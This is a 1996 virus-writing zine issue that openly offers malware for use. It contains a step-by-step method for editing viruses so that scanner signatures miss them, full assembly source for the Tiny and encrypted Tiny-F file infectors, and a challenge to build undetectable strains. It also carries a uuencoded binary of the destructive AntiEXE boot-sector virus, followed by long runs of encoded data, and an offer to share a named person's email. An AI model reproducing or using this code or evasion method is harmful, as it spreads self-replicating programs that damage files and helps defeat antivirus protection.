Virus Bits & Bytes Issue 1 June 1 1996 ------------------ INDEX ----- 000 - You're reading it! 001 - Why am I doing this? 002 - Modifying virii to get past scan. (Taken from 40Hex) 003 - This issues Virus Challange. 004 - Who was that asshole? And AntiEXE Virus! 005 - Application form for VBB 006 - The Color Macro Virus 007 - EXTRA! The Doom II Virus! 008 - Virus News! A List of Virii in the Wild CREDITS: Dark Night(moi!) - Editor, co-editor, virus supply, news, distibution....(well you get the point) Why Am I Doing This? Hi! Have you ever wondered why the hell somebody would sit down just to make a mag for other people to read and to enjoy (maybe learn :-)) Well, I'm not profitting of of this work, but at least I'm helping the world of virii programming different and more interesting! The goal of this mag is to supply you with source, played out virus code and hints on how to program (modify, etc) virii. That's why I'm doing this. TO bring life into the virus community, to see some action. Help Wanted!!!! Ok, I'll admit it right now. This mag isn't going to survive long if I don't get anybody to help me and to collect some news. I don't have the time nor do I feel like writing this mag on my own. So if you want to help send some mail to 101546.2222@compuserve.com. Greets! Hi to all you virus programmers out there! Also greets to Godarky who owns a nice little page of virus source code on the Web. Also special greets to VLAD whoose Win95 virus "Bizatch" I feature in this mag. DN - HOW TO MODIFY A VIRUS SO SCAN WON'T CATCH IT - OR HOW TO CREATE NEW VIRUS STRAINS The problem with most viruses is that this dickhead who lives in California named John Mcafee gets his greedy hands on them and turns them into big bucks -- for him. John boy is the reason there are over 500 viruses out there, and I wouldn't doubt if he weren't resposible for writing at least ten of them. So the best thing to do to some Mcafee dependant sucker, or lame board is this. Say you have a copy of a played out virus, lets say an older one like Armstand or Jerusalem. Almost every virus scanner can detect these viruses cause they been around so long. Now heres a quick way to modify viruses so the scanners wont catch them, in turn making them new strains. The tools you need are -- Norton Utilites (or a good hex-editor) Debug and/or Turbo Debugger by Borland Now heres what you do. Step A ------ Make a target file like this with Debug Copy the below file with your editor to a file called SAMPLE.USR ------------------------------------------------------------------------------- n sample.com a int 20 rcx 2 w q ------------------------------------------------------------------------------ Then uses Debug to make the file SAMPLE.COM executing this command -- DEBUG < SAMPLE.USR This will make a two byte called SAMPLE.COM STEP B ------ Infect the file with the virus. If this is a boot sector virus your on your own. Do whatever you have to to infect the two byte file. Make a copy of the file and keep it for safe keeping. STEP C ------ Load up DISKEDIT, which comes with Norton 6.0 (I'm not sure if its in the lower versions) PCTOOLS Hex Editor will work too but it takes more work. Now have DISKEDIT Hex-edit the infected file. Now figure out where the middle of the file is. Next put block on and go to the end of the file. At the end of the file go to the edit screen and select fill. Fill the lower half of the file will nonsense characters, its good to select 255d (FFh) the blank character. Now save your changes and go to DOS Now use SCAN to scan the file for viruses. If it detects the virus you didnt delete the search string that SCAN is searching for. Get it??? You see all SCAN does is search files for strings that are related to viruses. For example if SCAN was looking for CASCADE it look for something like this- EB1DAD1273D1FF121F In every file you specify. So what we are doing is narrowing down where that string is in the virus that SCAN keeps finding. So what you have to do is keep deleting parts of the virus with DISKEDIT untill you finally narrow down the string. Keep this in mind, search strings are in the first 150 bytes of the file about 75% of the time. Ok lets say you narrowed down the search string and lets say it's - B8 92 19 B7 21 CD It will most likly be longer but this an example. Now back to DEBUG - Do the following-- DEBUG E 0100 b8 92 19 b7 21 cd -- this is the string you found Then type -- U This will give you a unassembled look at what the id-string is. In this example it was mov ax,1992h mov bx,21h int 21h Now this is what you have to do, and keep in mind the following --- THE FOLLOWING TAKES A SOMEWHAT KNOWING OF ASSEMBLER AND HOW IT WORKS!!!!!! Uses Turbo Debugger to find the string, you can use DEBUG but I don't know how to do this from debug. Ok say you got the string on the screen -- mov ax,1992h mov bh,21h int 21h Write down the locations in the file where these strings are. Ex 0100h etc.. Now rearrange the AX mov with the BX mov like this --- mov bh,21h mov ax,1992h int 21h You see? You didn't change the way the code functions (THATS IF YOU KNOW WHAT YOUR DOING!) but you changed the codes id-string for SCAN. Now since Turbo Debugger dosent let you save the changes you must do it via - Debug. DEBUG virus.com a 0122 - This is the address of the string Now enter the assembler instructions -- mov bh,21 mov ax,1992h int 21h w q Save it and SCAN it, if SCAN doesn't catch it Congrats. If it does --- back to the lab. Oh well you get the point. One warning, this only works with un-encrypting viruses, or on the encryption mechanism of encrypting files (which will most likely be Scanned). With that in mind, have fun. HR Virus Challenge --------------- This virus challenge goes right up to what I have included into my mag at the beginning. I'm going to show you 2 copies of the Tiny Virus(tiny and tiny-f). You can look at the changes made and where the virus was improved. So my challenge to you is to program a new strain of this virus so that scan doesn't catch it**. ** You can send the SOURCE CODE to me if you want me to take a look at it. Sorry I wont take com's or exe's! If you send me one they will be deleted right away. Thanx! Cut out here for Tiny ---------------------------------------------------------------------------- ; Name: Tiny ; Aliases: 163 COM Virus, Tiny 163 Virus, Kennedy-163 ; V Status: Rare ; Discovery: June, 1990 ; Symptoms: COMMAND.COM & .COM file growth ; Origin: Denmark ; Eff Length: 163 Bytes ; Type Code: PNCK - Parasitic Non-Resident .COM Infector ; Detection Method: ViruScan V64+, VirexPC, F-Prot 1.12+, NAV, IBM Scan 2.00+ ; Removal Instructions: Scan/D, F-Prot 1.12+, or Delete infected files ; General Comments: ; The 163 COM Virus, or Tiny Virus, was isolated by Fridrik Skulason ; of Iceland in June 1990. This virus is a non-resident generic ; .COM file infector, and it will infect COMMAND.COM. ; ; The first time a file infected with the 163 COM Virus is executed, ; the virus will attempt to infect the first .COM file in the ; current directory. On bootable diskettes, this file will normally ; be COMMAND.COM. After the first .COM file is infected,each time ; an infected program is executed another .COM file will attempt to ; be infected. Files are infected only if their original length is ; greater than approximately 1K bytes. ; ; Infected .COM files will increase in length by 163 bytes, and have ; date/time stamps in the directory changed to the date/time the ; infection occurred. Infected files will also always end with this ; hex string: '2A2E434F4D00'. ; ; This virus currently does nothing but replicate, and is the ; smallest MS-DOS virus known as of its isolation date. ; ; The Tiny Virus may or may not be related to the Tiny Family. ; ^like she'd know the difference! ; ;----------------------------------------------------------------------------- PAGE 59,132 data_2e equ 1ABh ;start of virus seg_a segment byte public ; assume cs:seg_a, ds:seg_a ;assume cs, ds - code org 100h ;orgin of all COM files s proc far start: jmp loc_1 ;jump to virus ;this is a replacement for an infected file db 0CDh, 20h, 7, 8, 9 ;int 20h ;pop es loc_1: call sub_1 ; s endp sub_1 proc near ; pop si ;locate all virus code via sub si,10Bh ;si, cause all offsets will mov bp,data_1[si] ;change when virus infects add bp,103h ;a COM file lea dx,[si+1A2h] ;offset of '*.COM',0 - via SI xor cx,cx ;clear cx - find only normal ;attributes mov ah,4Eh ;find first file loc_2: int 21h ; jc loc_6 ;no files found? then quit mov dx,9Eh ;offset of filename found mov ax,3D02h ;open file for read/write access int 21h ; mov bx,ax ;save handle into bx mov ah,3Fh ;read from file lea dx,[si+1A8h] ;offset of save buffer mov di,dx ; mov cx,3 ;read three bytes int 21h ; cmp byte ptr [di],0E9h ;compare buffer to virus id ;string je loc_4 ; loc_3: mov ah,4Fh ;find the next file jmp short loc_2 ;and test it loc_4: mov dx,[di+1] ;lsh of offset mov data_1[si],dx ; xor cx,cx ;msh of offset mov ax,4200h ;set the file pointer int 21h ; mov dx,di ;buffer to save read mov cx,2 ;read two bytes mov ah,3Fh ;read from file int 21h ; cmp word ptr [di],807h ;compare buffer to virus id je loc_3 ;same? then find another file ;heres where we infect a file xor dx,dx ;set file pointer xor cx,cx ;ditto mov ax,4202h ;set file pointer int 21h ; cmp dx,0 ;returns msh jne loc_3 ;not the same? find another file cmp ah,0FEh ;lsh = 254??? jae loc_3 ;if more or equal find another file mov ds:data_2e[si],ax ;point to data mov ah,40h ;write to file lea dx,[si+105h] ;segment:offset of write buffer mov cx,0A3h ;write 163 bytes int 21h ; jc loc_5 ;error? then quit mov ax,4200h ;set file pointer xor cx,cx ;to the top of the file mov dx,1 ; int 21h ; mov ah,40h ;write to file lea dx,[si+1ABh] ;offset of jump to virus code mov cx,2 ;two bytes int 21h ; ;now close the file loc_5: mov ah,3Eh ;close file int 21h ; loc_6: jmp bp ;jump to original file data_1 dw 0 ; db '*.COM',0 ;wild card search string sub_1 endp seg_a ends end start ---------------------------------------------------------------------------- The Tiny-F Strain made by DA Cut Here! ---------------------------------------------------------------------------- tinyv SEGMENT BYTE PUBLIC 'code' ASSUME CS:tinyv, DS:tinyv, SS:tinyv, ES:tinyv ORG 100h DOS EQU 21h start: JMP pgstart exlbl: db 0CDh, 20h, 7, 8, 9 pgstart:CALL tinyvir tinyvir: POP SI ; get SI for storage SUB SI,offset tinyvir ; reset SI to virus start MOV BP,[SI+blnkdat] ; store SI in BP for return ADD BP, OFFSET exlbl CALL endecrpt JMP SHORT realprog ;----------------------------------------------------------------------------- ; nonencrypted subroutines start here ;----------------------------------------------------------------------------- ; PCM's encryption was stupid, mine is better - Dark Angel endecrpt: ; Only need to save necessary registers - Dark Angel PUSH AX ; store registers PUSH BX PUSH CX PUSH SI ; New, better, more compact encryption engine MOV BX, [SI+EN_VAL] ADD SI, offset realprog MOV CX, endenc - realprog SHR CX, 1 JNC start_encryption DEC SI start_encryption: MOV DI, SI encloop: LODSW ; DS:[SI] -> AX XOR AX, BX STOSW LOOP encloop POP SI ; restore registers POP CX POP BX POP AX RET ;-----end of encryption routine nfect: CALL endecrpt MOV [SI+offset endprog+3],AX; point to data MOV AH,40H ; write instruction LEA DX,[SI+0105H] ; write buffer loc | MOV CX,offset endprog-105h ; (size of virus) --\|/-- INT DOS ; do it! PUSHF CALL endecrpt POPF JC outa1 ; error, bug out RET outa1: JMP exit ;----------------------------------------------------------------------------- ; Unencrypted routines end here ;----------------------------------------------------------------------------- realprog: CLD ; forward direction for string ops ; Why save DTA? This part killed. Saves quite a few bytes. Dark Angel ; Instead, set DTA to SI+ENDPROG+131h MOV AH, 1Ah ; Set DTA LEA DX, [SI+ENDPROG+131h] ; to DS:DX INT 21h LEA DX,[SI+fspec] ; get filespec (*.COM) XOR CX, CX ; || (clear regs) MOV AH,4EH ; || (find files) mainloop: ; \||/ INT DOS ; ----\/---- JC hiccup ; no more files found, terminate virus ; Next part had to be changed to account for new DTA address - Dark Angel LEA DX, [SI+ENDPROG+131h+30]; set file name pointer ; (offset 30 is DTA filename start) MOV AX,3D02H ; open file INT DOS ; do it! MOV BX,AX ; move file handle to BX MOV AH,3FH ; read file LEA DX,[SI+endprog] ; load end of program (as buffer pntr) MOV DI,DX ; set Dest Index to area for buffer MOV CX,0003H ; read 3 bytes INT DOS ; do it! CMP BYTE PTR [DI],0E9H ; check for JMP at start JE infect ; If begins w/JMP, Infect nextfile: MOV AH,4FH ; set int 21 to find next file JMP mainloop ; next file, do it! hiccup: JMP exit infect: MOV AX,5700h ; get date function INT DOS ; do it! PUSH DX ; store date + time PUSH CX MOV DX,[DI+01H] ; set # of bytes to move MOV [SI+blnkdat],DX ; " " " " " " ; Tighter Code here - Dark Angel XOR CX,CX ; " " " " " " (0 here) MOV AX,4200H ; move file INT DOS ; do it! MOV DX,DI ; set dest index to area for buffer MOV CX,0002H ; two bytes MOV AH,3FH ; read file INT DOS ; do it! CMP WORD PTR [DI],0807H ; check for infection JE nextfile ; next file if infected getaval: ; encryption routine starts here ; My modifications here - Dark Angel MOV AH, 2Ch ; DOS get TIME function INT DOS ; do it! OR DX, DX ; Is it 0? JE getaval ; yeah, try again MOV word ptr [si+offset en_val], DX ; Store it ; Tighter code here - Dark Angel XOR DX,DX ; clear regs XOR CX,CX ; " " MOV AX,4202H ; move file pointer INT DOS ; do it! OR DX,DX ; new pointer location 0? JNE nextfile ; if no then next file CMP AH,0FEH ; new pointer loc too high? JNC nextfile ; yes, try again CALL nfect MOV AX,4200H ; move pointer XOR CX, CX ; clear reg MOV DX,OFFSET 00001 ; where to set pointer INT DOS ; do it! MOV AH,40H ; write to file LEA DX,[SI+offset endprog+3]; write data at SI+BUFFER MOV CX,0002H ; two bytes (the JMP) INT DOS ; do it! MOV AX,5701h ; store date POP CX ; restore time POP DX ; restore date INT DOS ; do it! exit: MOV AH,3EH ; close file INT DOS ; do it! ; Return DTA to old position - Dark Angel MOV AH, 1Ah ; Set DTA MOV DX, 80h ; to PSP DTA INT 21h JMP BP ;----------------------------------------------------------------------------- ; encrypted data goes here ;----------------------------------------------------------------------------- fspec LABEL WORD DB '*.COM',0 nondata DB 'Tiny-F version 1.1' ; Program identification DB 'Dark Angel' ; author identification DB 'Released 10-19-91' ; release date endenc LABEL BYTE ; end of encryption zone ;----------------------------------------------------------------------------- ; nonencrypted data goes anywhere after here ;----------------------------------------------------------------------------- blnkdat LABEL WORD DW 0000H ; Only en_val is needed now because of new encryption mechanism en_val DW 0h endprog LABEL WORD tinyv ENDS END start ---------------------------------------------------------------------------- This is the end! Who was that Asshole? --------------------- Well, the story is this. I was at school sitting in the Computer Lab, hacking the network :-) when suddenly I noticed this directory called virus on the harddrive. This made me curious. I checked, and inside the directory there was an AV program called Dr. Web. I ran the Program and it detected the AntiEXE virus in memory and in the Boot Sector. So I copied the prog. thinking this might be useful. Then at home I scanned my computer and I also found the AntiEXE infection. But to my surprise the virus had just trashed a few exe files on my HD. That was the second that I realised that I must have gotten this virus of of the school computer from some asshole who didn't know what he was doing or did it on purpose. BY now I have figured out the guy's name and E-Mail address. I will gladly send it to you if you want. For this issue I have included the COM of the virus(uuencoded*) and a description of it. I will support anybody who wants to make a new strain of this virus, etc. But remember, don't make the virus do any more damage then it does already, because I usually don't support malacious coding. Well, here it is: The AntiEXE Virus Description(info stolen from Stiller Research): AntiEXE Aliases: D3 Synopsis: Destructive, resident DOS boot sector and partition sector virus
Damage: Inadvertent damage to diskette files and deliberate damage to .EXE files
Symptoms: Damaged files, less total memory and PC hangs
Details: AntiEXE deliberately damages .EXE files by changing the first byte of the file. Like Stoned, it will cause damage to any infected floppy that contains more than just a few files. This virus is memory resident and will infect any floppy accessed. AntiEXE remaps the disk interrupt (Int 13h) to avoid resident monitoring programs but has no stealth capabilities. * UUencoding and decoding program included with this issue! Cut Out Here --------------------------------------------------------------------------- begin 644 antiexe.com MZ10!30,``5,U+C```@(!``)P`-`"_0(`"0`"````35I``(@!-P_@@/SY=%(N MHP<`S=-R2IPN@#X(``)U0%%65QXKR8[9]@9L!`-T(`X?B_N--AX`N0@`5_.F M7W0.@<<``B[^#@<`=>CK`I"J'U]>68/Y`74(@/X`=0/H!`"=R@(`4%-14AX& M5E<&'RZA```[!W48+J$"`#M'`G4/BX\$`(JW!@"X`0+-T^MC@/H!=UZ+1Q;V M9Q`#1PY2L02+5Q'3Z@/"2(M/&%'1X2O2]_%94(O"*]+W\8KPBLI8BNC^P5B* MT"Z(-@8`+HD.!`"X`0/-TW(;#@?\OP<`B_,#][D7`/.DN`$#,]NY`0`J]LW3 M7UX''UI96UC#,_^.W\063`")%DP#C`9.`_J.U[X`?(OF^QY65J$3!$BC$P2Q M!M/@CL"C3@#'!DP`)P!0N%4!4+D``?SSIX`0*[``*Y`0"Z@`#-TW+C,_:M.P=U!JT[ M1P)TUKD-`(D.!`"X`0-0S=-8QA15X5WF.E<5Q&`=KEIR(Z.IS.,;! M;^X:XV"X(OGS:2)OX6@N,/C#ON)O3JEP-HRTM7H#=[NE7IB'[6/Z2EVACSB= M-D-TAIY&(QWDVUK!PN@]K>>^A@<`!2N")_05`V,P=_==='`OY$_`F3\^$^$) MY_4@.5#[Q^_O!>LQC)VZ=PKV35EAM&,E@_$#GL\P^%NV-FP0I.T$L#(^#0?< MTA#&G_OI.8D.-#OVYP((PC^0/L.5U!T((]?ULX(]=E3JS59WJ@*]@NS\+(JD M;K3ITOY7'W&C.M7VHJ]U2_H>[W,CI-'P7)M=!Y_9%[;\.D!7EA)-8RTK)YIR1;+!_X(W.AJ)ZF2#MY_ M?/?A]O;F+U!+`P04``(`"`#<15,?_/[H#'<2````.@``#````%)!24Y"3UV=FN6:L;TS4JG>F]*EZQ M8^_$E+B`00`(DO$H14)(<("00@B'!VJ*$ M-Q(=D**#O'*_O<])2&)0[&--.^,F.WN?_;V_;W_?/EENNTV/V&153P\07NW? M"']BR1%(K'5;8S$=MTT$X<<\+SD<#N>RXW[[3K5%Z`\P,5P#XUIFOHX9`V%< M#_U!Z`]!?QCZ!N@;Z2U`/`+]4>B/07\<^A/0GX3^/>A/0?\GZ$]#?X;A=[]] MN]H^(@K^X@@V$4P<@3&&^("XE_8D\8`KY_W10J`?7E?3X)?=<\0]]H>)?Q8[O:LENXM9CP`TF.(@\1.&,.)HZ`) M!_MAM>UI1OX:IO:MAB8`^M7GZ#EM-0=DQQ%[<2P.WZ/_62Q4@_WN()_<]1L2 M^=TY$EXU_?WL;"Z+COY[9.UZY^\_PM3LB/"8J-NI0'/M`5,Q! M]O9M+[!W1H4?C>0%=DMT`/',C\)__HOMP<\\'_NK%P^L(39`=7)<@]+P%)2(@\1' MA,?GS\2Z;ZZY[;=UW]KV\%I"SMU6U!;4_>5>Q)<@C<$MB7F3=\*>7M3 M65H`\>/G:BZ^`&LB/_H=#GDG"_H#1"@^]2*),'SVOP*GWR%\)J*5."("YD?N M6_J8=Q*T:=`[_@]8]/O^[UGT M7CG,HF-VG$6_\]>RZ-\$G[+HLW^!1?\F8$-,T>^%G7[T^\#;?L2J?S\^"^/W MH>_X]>L'0O;MW/[Z_N#=>W<%[0]^?4_(OMU!N[;M#-E_-UN>9?9U+"?F3Q%1 M7Q[G)?3.%'3^'>]W)6^\WFFWYNL9YGWS9]]19WO MG_]_^]97Q"'^51T8@"+!\0H@^J'F_)WB';.[MBT$_6N.&=_90B_?:42_'Z3, M\VI&5(-RF=&Y_KOGZ'UYFGG^LF,WC#FPR?_WA_2S^[@-QFP8VV$,VTJ/__(< MG1?OPX@*52>,;$8?7^T=+WFHPFX"S[)NT\2[><.=$DZOX-G5\EEI?.:`WM2(2-SD%3IY*9&^B`E\W,-27)RO MZ"P?UK4:-1901.L%+D%@Q5AO[W6]Q6CMU8%UG@ARA)!_'?O+"U2$6=.@:>JR MV0M<@,`%=JJ]QPM0B`!*!/!!E8^`%6-H3U#3)K/!6Q\9@I=-MNM6Q%`B#!6& M^."OH@W&U,-ZBY:R>"&4(X333@$^42JPCK3A-HNNPUL#!=;@1JM%;S"TZ+RI MR^B(])C-^G;;[0X_C16DP3>Z=+>[O=2-WH>!==B[`Q9=OP_@)P@H^XO)8-)T M><-JL54,S`?MQPC^B8?G?6!5X_C0VBW+@4^BJ<2$2@<74+3Z(DC#PL[\5DQ6 MZ\8`L/)Q*J+LT9S>6IA?;B@NR<^7=9:0LGM8SP>1\<`,Y0S%)&ZS=D9D*AS4 MMU.96LI9F9KI0L4LWYZ0^93%HK?0,DQ%0`0B5:2^M;7'8J&T."4IFK@95TRH MBA6F:;U99QB'G6%%SS(KGM*[CRZ;=AWL#K>5\I;)=JB(!MC-KK5/6I@T\`*A M*GN#,M/LW:NL%%51=^$*P(>E9?FX&BC'>LSZ*[U4NP<(5X)RF\E`W=!U4V-6 M#R!=!3JPTAZ`(A?#HZH-/(+2;I6A^B/J$//S=R!J!D>.3(7.QP?IF0=WO,%#Y[9TBO-3BS MD7;H>%S>%YKWBJWKBS"!UGA"-3-D)ZT419K4Y'G*0I$Z@X72:?M)DW-OP8S4 M8%U(,]71:]"9*:V1A*,&Q0Z?860.B4=Z[Z9F",D,L=;8K+*!UTP`S"2G]:0; MOM98K\+`3@!F8.#RUB23R4RM,46E4DVJ24R#K4TU`5?$&$B8T*9VBLGI+MBM MQBK`5BTG"@+DT'P08*A=2TZJM4:E2C4.=8GLU!IE],P$KNG-O+OY=&5;-A\E MT[(Y"LTC6U&:U*(LTL[0]:RDF.N!1!>Z3ESH/%(1G<]0]AHUSVY%-:[6R4BQ MO(6!#IW@!;X2'\$4#`\(-:YMG=H97.%`SP*KG>(JEO?,C*O:^E!"[E9_4+E5 MT.1024_)W+4QY6N-9W%\QO5FTLWO)F=`3H';&=M[^TDG4X`+21Z]KT_QR!17 M(-&Z<]?B.#$AT\M[ZTE]NZ&?U%(&RLQ$B>R"["=U9"OP!I1&WVXQ(9<5"9// MQ:-#Y?^*K27%"D\C:JTW2U"@:JT5Q1C5+3)S@B2,2R8H!9I#F[U$E/; M*?/-NW:9IX<5J(J40FRPVVC]F9*&E9:C-TCZ7&1*8;JK0J:[5\CTKU(ATYT5 M4HE+W*"^=:7R*/%5'D^[E4>@_69KH]=/AW*UR6(UDP:]OO?OO6IX&EYAI5KU ML&^PY=]<18%$EM\IDR$%[K#E/7/#/07DV+[5Y@'M`DHYCBJ7B;(NOQE*7.D@ M<4\'R5=)!PE*AX7%[%'IKS_,G$H5G!(++C5*T[)JLH2`EC)Y*>O$J;RTK$M- M20))):;(5IW\\8=IBXL`-DN7LM-.ZD]6+V:K*#S/5FF9T8;'U$.+UP%W:/D! M-%,!`8V5K7+I<4-Y*KE49E:N M0)H,W"Y(;YV1@(%9'O8.8VU@92HM9W$H6^)PR5>-V;)I!]%T/OR"T,$U\UF( MX:6YDW,?SF)>\W.9,Y="2[PT M.?O9@'YPX.KD8/*5L@W)24EN4'+@ZK#]VMS8[$2??$QH&``A=@^9F;0>-,B' M](D!$5(@R8YHE((K@@W)8RG`($DPS%<.7+LVO[!@!W6D)R;LF$?FA#1]<(@_ M*QQ3%B@J^%6F+KUPLC@M3916)>WA@FO',[EIF5214$P6YP@S^?RJ$]&@*P MB\MX)3?]$Y%<+$K@BD=Y;>&C(R-N4+LH04#&9PK3@30HG%^E%XZ5B$`1TD.O M.5I7&N1#0[YH`"DY0B(::I@W'#XJM`&#D6'!!"6*C\](2R-!IUM+?!+SF./? MFBTL:#O343PY9+_:-I4J3NI0CG5W&[NGC!=Z.SIU;6U3S1UR$Z7I-IZWR-6C M.O6%UJ96P9;V\O.]5'=LB`\E MJZ``P"XN"L"_:1PU:DI:^5M*Y'(W4"D&C709U537[5"%4=VNT_1V6(!;Z_6" MMJFDCN)1(^BH\U"Y$:DL@Q555TM!4YLQ'^/6-[?1YM$D/JQ"F&"87(=X<8M: MB[:48#;RHO8RKE&CN=#=C,-G,[+ MX^8U<[.R><>2!,V"YBF>/5Z4FL?-S;&+2Y/$6<(OA&V1_,'<;%%>MK$\*YNK M3.#F)@D$S2Z\T7.BG#-CJ!9Q[M2R@4I M21Y"9VA%:)`/\0+N)-+`GH1HC!/"B4A=?XZ)4C" M/&8$?[UYN;^QI>YS26Y&6F/*%],WZGI.5E145J14*LKJJAH:&U.T=1>KSS55 M5):77CR;TW!64:^IGWGC8U-YV;F*,D=V74V#Z%QI0VXY8-8'OE'3WP^3J;J^ MQIIZ>WUR?V/*`)XWIM3UG,VI1*C)E3F533T7:D`NEM=]ZEQ54T.-"]288F-( M;M191;5U*AK>X(W7=AM/$-[@1M&VDCT>5)K&RDN^333653DRSCC[@<]^EQJ6$!B79,%PA*U7RJCN-!L'5(HE$+*D6ITL%J8D\7K5@7"7B*1-2$ENN\EO?'!F% MI47!:$K",8GX1,8H5Y[(3>4J$Y(EXII*;QJ_O8W138;,M4IV%Z3D%$K+A&)N0FBD64' MC+JAC(NYPL1C4D$&KQITDHO!5XD>0AE%:-#*+AM-1#3J,?[8FR."(6`P.B:\ MHA8?.Y8ND2#W@]Z)F,L./QC7[HF*B0P[C&_Z^!-A@0$^ M+WD$O33MD,'XY$[.H;"CA^/8>\-BPOX4$Q;]-OOEJ"-Q/FZ.^./]QB+HV\=K MV.C;ZU8)4X\VNJK3)N)Y8BU]9>O9VV^([0MZ9<^_AQSX^;:=(3L`C?:".(CYB[;6\]"NMJ/V(-@_]]YBZ<[3%83_7' M-Y+0^@B^*TD0BVA]:`VQ'M^0`[[,G;G!QV&]X`&@#<3KOV'NT-F?@/5K:T$' MFL\H\_]IGOL>K/>O`ZOIBY`9S%VYAY^"=5L`R*)OSI6SZ#MUA1"83;M8`4%' MXZ)"HCE'6,3ZER,.]SPH'E_JBHP[&[$8!%_&C?T2.Q M/V&'QW"`""8'.8!(5PX[AO!L1B^5%TLB!B,F.PU&QP#G`J1B+^"&M%E(F M+#PNXETWG8!+'"$\]X*(A]!7EV[.VC'OI!0`E&_LBMX M3_`!"$=`T*O[0X)?"]X!FPC/0_8&[X$-$H!0@E][93\$!\]#@_X0#&$*1#@[ M=H6$!D.4USL!0:&P%]8#\:Y0+(1XZ?=[V;O"8!/_!R>._8O0B)]"W_T:>V\H M^\477C@8'4'LVKO_Q5\3>T-W['ME[W[B;MCK_?_@OY/@$9O_!Z5.()']X"\# M#B)#<"K1B?8T\1.8++&64ROP#G^K;Z_Y:5E_)/[H2FJ6QVAE+:<[Y^_&#B)^ M63KH%@]_;NUGQ!-/HNNQ^R,B8=_!+F3OBXH,.T(\!*M^1.@'D6]%'28>W(I0 M@F(BH*IN@0W%"DB";.^&S'\;\Q:&SR6BOM(=NS7$L4TK&_,#?S8S8RKE6N\[ MKKZNF/\_4$L#!!0``@`(`&&JC2!(>VC!,`$``$@#```+````0T],3U)3.2Y4 M6%2=4\U.@T`0OI/P#A/20XF)48\F'E"0]`!-"O&^P$C1A3'[T_C*OH6[I07: M8J+N:<)\^_W,#@DK!4%.Q&5B2]=QG4P7D`2KU'7@<-8=1$*0@)@4]>6&M&HZ MM/@!Q:N4M;B`!TBI?6[*;8-BL?2GF-4KM%9'7A1-:/]`F> M5$RHB3WO$AHV+52\AD#"VE@:3 MS-Z;C[E$C%,]KSB)V`,LQ?UO7NJ49[P1=97),7VC390`=JS@"$PKZA..[?!+ MLE(U.Q1[&S(P&+B9$AQFDK%=3C&G@O'E<3?\"Q05;VCIQL;>>DC]T!E:46`BMO;E96T=BQ'\SOXCK?4$L#!!0``@`( M`%BJC2!!ST"P7! MC"?HLQV.I6W9EI\'X(T72]N"PWG-8"H$"9B3HN+QC7+%,S3]9==B#:FAD[W` MQ2"/8;7!##P9O]`W.%(QH6J3G#K4_9$L5'R'PMLSC',]I]_HX"E$20QCJ3G" M#4(8'&+1YG+`LQ.2O MN:Z#)10W:?<(_Y-O"Y1M':&'K0JTQ0HWO&'A#3ZS[^KVNM?"LV,:YY3B;>H! M7X/4+1$P"5\D(HB,@]&^:&H*TVW"%)X5H-?5FY%(F3*F"P6-VN!_V*#%7WD. M)K6/%:1=I^53_^?=!` MP0>:?\U1$ETJ8E*/S;"1>#3R,8]!];=GJ-V%)46VH+&1=3>#JXC"7N>1RX M!U_IQ6K:KGYV@,(P%P(CYYP.,U$;-07]#;.M7U!+`P04``(`"`!+JHT@--KH M'\0```"%`0``"P```$-/3$]24S.YQY+[G>Z6FD$=9X7NP MSE5`(B5*2%'A`F^H52>XXSB4W6&PJN.!QISJ!U0M%Y"/CQ.^@(RJELH9$NNX M7:YG93U5F/9(ZSXH<+ATK.VXW`5A^$5%^N1,=9-;S!%C%'.5SZC'7WT6\M_T M;KW-5H?/.@3V4"H3TQK*.)8Q_,9_O>&U!+`P04 M``(`"``ZJHT@6,):H@4!``!4`@``"P```$-/3$]24S8N5%A4C9+12L,P%(;O M"WV'0_%B19#II8@P:3=VD0GK7B#)CEVDRX'3=/C*OH5IVMD,A]JKD/_/_R7_ MJ9":"9:FP4J>,$W2I.H4B,5ZDR8P?J\62F9B6)&C8;FESAD;_&?7^@V.?5A[ MIPI470V[`UH0;?U"'Y"U3K+[YF3QP6TI`*U4#<*B$<%Z=F&CDNC#P;Y9I;GUWVKAI1L_K*2>L>>'=-&?VD9:],Z1IZT M4%!!0S%Q48\7/7D%GI[A?OX02IJT_S!*N_<9\8TNYS/@?YW*3^!Y3!AR,KB% MROE*?&SNUQF0UATS[K-K]^B)_H']AO]YTN0+4$L#!!0``@`(`#6JC2`+:3O, M[@```-P!```+````0T],3U)3-2Y46%1]4Q]UH+0Z",]>=A0H+$]4`S68>&4;OL!URS:O^@:=3S#\8(.9']^HSN(/B@? M?OQ$-IP?'AH)Z)3N$%0,-(H4N/[JE0GVAEX.R"IQ8/DH,-FVZG:D34=:=8L= M7=?67"SZIT55_:*2_L2L68")O8\V!/1E/IQ>4SZ9L\<(7O_*:23_FTJ!YYIC MPD%'P#.T(:V>9*O4"R!CHO=X$N5IXTY)/:^5'=,Z>9`^D;-O4$L#!!0``@`( M`"^JC2#2:8R%Q@```(,!```+````0T],3U)3-"Y46%1]D$$*PC`01?>!W&$( M+BR"!W"GJ*6+MF"]0!.C1MJ,I$GQ^":V-8+HK(;,_/_?)*^%05@[B^5=:DHH MJ1R'?)T5E,!8I8:=,6@@18M#>T!GE99Q)W;9&=I@VBWY5G)W@>-5:LB[RP8? MP#I;&_O.8R%P$HZJJNZ/F#;(ZV9>8+M7XJJDF!%N,9!1 M\DFZ^G7.L/P7/HZGFJZ1+Q\&"ZBL1_2VB>\9H!#.&'EB4;K3)^\>L$*BQPD/ M_J\I>0)02P,$%``"``@`)*J-($JQC8XW````/@````L```!#3TQ/4E,S+E18 M5/--3"[*5W`L++@!02P,$%``"``@`&*J-(,Y/OI\U`0``W`(```L```!#3TQ/ M4E,R+E185(5236N$,!"]"_Z'07I8*2QNCZ4MV&IE#UI8E]ZC3EU+="`FMC^Y M_1=-_$!EEZVG.._->WF9B5DN"%XKC@E^V99MI2J#V-\GM@7C]]9`*`0)B$C2 M<#R0DE6#AC^Q]A]0&ZUVFP68J1*.)VP@;LMG^@:GE4S(R<99]AW"&+!A&4?P ME:2XUYCAX+=EN:PZ%`-B..`M!8*JAH*7X+=:/S]5*!)2'3(U4R*4+TJ\,ZZP M-=QE,^-4KFLZB?[?&I68BA]]L4?PACAG]=WE[!/-"RW=^DD%-$QH.;'[54R-P,,3[+R[/MZ,7KJD]5GRIGY/F,PDK^C@X/#@\F\0Q&'@D/#P;A',1_YS%R\,#2'[T__`-.AJ?`N6F>[*"R8O'<`[1'0THBXY:7;>=.J&S M5Q38M]S84P@#QBB#1\JI_/C,0U?"4\!PD3J&;/,7=$ MWSUV),)[1/XWHPL2X(0S$BZ/6LX[">?T/7).P/%I'')D4>RT\ZWD3J^*W=^] 